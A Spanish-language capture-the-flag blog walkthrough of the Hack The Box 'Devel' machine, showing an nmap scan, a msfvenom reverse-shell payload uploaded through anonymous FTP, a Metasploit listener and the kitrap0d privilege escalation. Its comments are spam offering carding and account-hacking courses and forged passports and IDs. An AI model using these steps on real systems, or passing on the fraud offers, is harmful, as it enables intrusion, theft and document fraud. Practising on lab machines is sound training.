HTB - Devel walkthrough -

febrero 09, 2020 , , , ,

    En este post les mostrare los pasos para completar el challenge devel de hack the box, el cual para mí me pareció muy bueno. Estoy practicando con maquinas Windows ya que quiero mejorar mis técnicas en estos OS debido a que hay mucho que aprender. Esta como veremos es bastante básica pero interesante a la vez, empecemos.

Enumeración 

 Primero empezamos enumerando los puertos y servicios de nuestro objetivo. Para eso uso Nmap con el siguiente comando.

> nmap -sC -sV 10.10.10.5


Como podemos ver tenemos el puerto 21 abierto el cual esta corriendo el servicio FTP y este tiene habilitado el Anonymous log-in. A la vez nos muestra un directorio y varios archivos (al archivo sha4rk.aspx es de cuándo estaba haciendo la maquina). También vemos que tenemos el puerto 80 abierto corriendo IIS. 


Algo que note de la primera es que esta es la plantilla default que sale cuando corremos por primera vez nuestro server IIS, y si bien recordamos este archivo lo podemos ver en el FTP output junto con la imagen llamada welcome.png. Esto quiere decir que el servicio IIS esta ejecutando los archivos de ese directorio, por lo tanto podríamos intentar ejecutar una shell desde nuestro navegador. Para esto debemos crear una shell con la extension .aspx y intentar subirla mediante el servicio FTP.

Exploitation

Para crear nuestra shell usamos msfvenom de esta manera.

> msfvenom -p windows/meterpreter/reverse_tcp LHOST="Tu-Ip" LPORT="puerto de escucha" -f aspx -o sh4rk.aspx

Una vez tengamos nuestra reverse shell pasamos a conectamos por ftp con el user anonymous y un password random.


Usamos put junto al nombre de nuestra shell para subirla al servidor. Verificamos que esta haya subido y ahora pasamos a configurar nuestro listener con metasploit.

> msfconsole

>use multi/handler

> set PAYLOAD windows/meterpreter/reverse_tcp


Una vez configuremos nuestra ip y puerto de escucha vamos al navegador y ejecutamos nuestra shell.

>http://10.10.10.5/sh4rk.aspx

y como vemos en la imagen de arriba tendremos nuestra meterpreter.

Post-Exploitation

Ahora pasaríamos a intentar elevar privilegios para tener mayor control nuestra maquina víctima. En nuestra meterpreter corremos el comando backgound para dejar nuestra sección abierta. 

> search suggest


Cómo podemos ver el que nos interesa en este caso es el numero 3, ya que estamos buscando exploit de manera local en nuestra maquina. Vemos las opciones y solo nos pide la sección de nuestra meterpreter, en mi caso era la 2.


Una vez se me mostró esta lista antes de tirar balas locas (probarlos todos a lo loco) busque en mi navegador por el Id de cada una y la mas que me convenía en muestro caso era el ms10_015, ya este exploit nos abriría otra sesión como SYSTEM. en mi caso esta fue la que use.

use exploit/windows/local/ms10_015_kitrap0d


Bomm, si escribimos "whoami" podremos ver que ya somos system y solo faltaría pasar a leer los flags user.txt y root.txt.

Espero que les sea de ayuda este post, si quieren mas post sobre walkthrough solo comenten del nombre del challenge que desean. Compartan, para dudas y preguntas me escriben por Twitter.


3 comentarios:

  1. Unknown1 de marzo de 2020, 3:59 a.m.

    Easy "water hack" burns 2 lbs OVERNIGHT

    Over 160 000 men and women are using a easy and secret "liquids hack" to drop 1-2 lbs every night while they sleep.

    It is very simple and works every time.

    This is how to do it yourself:

    1) Get a glass and fill it up with water half full

    2) Then learn this proven hack

    and be 1-2 lbs thinner in the morning!

    ResponderBorrar
  2. Ds LeakS3 de noviembre de 2020, 7:22 a.m.

    Hello W0rld


    I’m offering Hacking / carding short courses that you can learn in 1 hour to 2 hours.

    You don't need to spend a lot of money on so-called fake hackers and fake products,

    fake services money transfer, credit score and loans. Hack anything your own via

    Android / IOS no need hi-speed computer nor required any IT special skills. Course

    are available in Video and text formate also guide privately on localhost with practice.

    courses are mentioned :



    * Android / IOS hacking

    * Cybersecurity landscape

    * Network cybersecurity attacks – management and
    monitoring

    * Malware and advanced persistent threats

    * Bank Account Hacking

    * Credit card hacking

    * Social Media Accounts

    * Password stealing

    * Carding course online / Offline including VPS / RDP

    * Credit Card checker + Balance inquiry

    Beside courses I’m sharing with new and upcoming leaks
    In hacking world.

    Contact info:

    DsLeakS@gmail.com


    ResponderBorrar
  3. ken Henry15 de septiembre de 2022, 3:49 p.m.

    We produce only high-quality Registered Passports, ID Cards, Driver’s License, IELTS Certificate, VISA’s, Resident Permit, Birth Certificate, Diplomas SSN, TOEFL, Exit/Entry Stamps, etc that can be used legally both nationally and internationally. It will be produce with 100% authenticity like the original documents. We also use new biometric technologies for all types of our documents.

    Documents duplicate service:
    Documents duplicates producing means we will clone real existing documents and replace the information's with your provided details to suit your activities, database considering on your age, sex, nationality, etc. It will contain real name of parents of the person, address, some other useful information which can be asked at the airport and customs by immigration, ect.

    Documents registration service:
    For some Countries we can offer to register your new documents in the government database after it will be produced. In fact it will be the official issued documents and you can use it like the original ones. But the price for registered documents will be higher than for the regular documents producing.

    Visa/Stamps Affixion Service:
    We provide a possibility to affix almost all kind of stamps/VISAs into the passports to fill you more confident. We don't provide this kind of service separately from passport producing.

    IELTS Certificates:
    We offer high qualitative English test certificates without exam. Certificates will be original and registered in official database. All certificates we issue carries a band scores level of your choosing (6.5-9.0). IELTS is accepted by more than 10,000 organizations in over 145 countries.

    This includes:
    Universities, Schools, Training Colleges and Tertiary Institutes
    Government departments and agencies
    Professional and industry bodies
    Companies and employers.

    Contact:
    Wickr ID:::::::::: Spidoplug
    Email:::::::::::::: firstclassdocuments20@gmail.com
    Website:::::::::::www.documentsonline.store

    ResponderBorrar

Suscribirse a: Comentarios de la entrada ( Atom )